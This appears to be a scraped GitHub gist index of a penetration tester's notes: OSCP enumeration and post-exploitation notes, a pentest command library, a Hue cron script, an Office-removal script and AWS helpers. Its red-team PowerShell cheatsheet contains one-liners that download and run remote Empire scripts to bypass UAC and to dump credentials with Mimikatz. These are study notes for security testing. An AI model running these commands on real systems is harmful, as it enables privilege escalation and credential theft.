[TOC]
Windows Initial Checks
Basic Info
hostname
systeminfo
whoami
Global path
If any part of the SYSTEM %PATH% variable is writeable by Authenticated Users, privesc exists
View pentestws.json
| { | |
| "username": "brakertech", | |
| "export_time": "2021-01-28T23:14:25.004Z", | |
| "export_type": "Account Items", | |
| "service_command_library": [ | |
| { | |
| "service": "http", | |
| "sort_order": null, | |
| "name": "davtest", | |
| "command": "davtest -url http://$ip:$port", |
View hue.sh_crontab.txt
| * * * * * . $HOME/.bash_profile; cd $HOME/Library/cron/philips-hue-experiments && $HOME/Library/cron/philips-hue-experiments/hue.sh 2>&1 >> $HOME/Library/cron/philips-hue-experiments/log/hue.log | |
| @daily /bin/echo "" > $HOME/Library/cron/philips-hue-experiments/log/hue.log |
View hue.sh
| #!/bin/bash | |
| # Author: Steve Stonebraker | |
| # Date: 11/16/2020 | |
| # brakertech.com | |
| WHOAMI=$(whoami) | |
| path_phe=/Users/"$WHOAMI"/Library/cron/philips-hue-experiments | |
| path_log="$PWD"/log/hue.log | |
| path_npm=$(which npm) |
View OSCP_Windows_Enumeration.md
ssstonebraker
/ remove_office_365_mac.sh
Created Jun 12, 2020
Office 365 Mac 2020 - Delete everything
View remove_office_365_mac.sh
| #!/bin/bash | |
| echo " Removing Office 365 apps..." | |
| rm -rf "/Applications/Microsoft Excel.app" | |
| rm -rf "/Applications/Microsoft OneNote.app" | |
| rm -rf "/Applications/Microsoft Outlook.app" | |
| rm -rf "/Applications/Microsoft PowerPoint.app" | |
| rm -rf "/Applications/Microsoft Word.app" | |
| rm -rf "/Applications/Microsoft OneDrive.app" | |
| rm -rf "/Applications/Microsoft Teams.app" |
ssstonebraker
/ aws_scripts.md
Last active Jun 11, 2020
View aws_scripts.md
List accounts in org
aws organizations list-accounts | grep arn | awk -F'/' '{ print $3 }' | awk -F'"' '{ print $1 }'
ssstonebraker
/ Pentest-Service-Enumeration-Screenshots.md
Last active May 26, 2020
View Pentest-Service-Enumeration-Screenshots.md
Basic Usage
To view basic usage just type:
pse
Listing commands for a service
pse <service-name>
ssstonebraker
/ OSCP_Post_Exploitation.md
Last active Oct 15, 2020
View OSCP_Post_Exploitation.md
Pupy Post Exploitation Toolkit Notes
link to project home: https://github.com/n1nj4sec/pupy
Create aliases - modify pupy.conf
Modify pupy.conf Under the section starting with [aliases] you can add them
[aliases]
ssstonebraker
/ OSCP_discovery.md
Last active Oct 15, 2020
ssstonebraker
/ OSCP_Redteam_Powershell_Cheatsheet.md
Last active Oct 25, 2020
View OSCP_Redteam_Powershell_Cheatsheet.md
Description:
Collection of PowerShell one-liners for red teamers and penetration testers to use at various stages of testing.
Invoke-BypassUAC and start PowerShell prompt as Administrator [Or replace to run any other command]
powershell.exe -exec bypass -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/privesc/Invoke-BypassUAC.ps1');Invoke-BypassUAC -Command 'start powershell.exe'"
Invoke-Mimikatz: Dump credentials from memory
powershell.exe -exec bypass -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/Invoke-Mimikatz.ps1');Invoke-Mimikatz -DumpCreds"
Import Mimikatz Module to run further commands
NewerOlder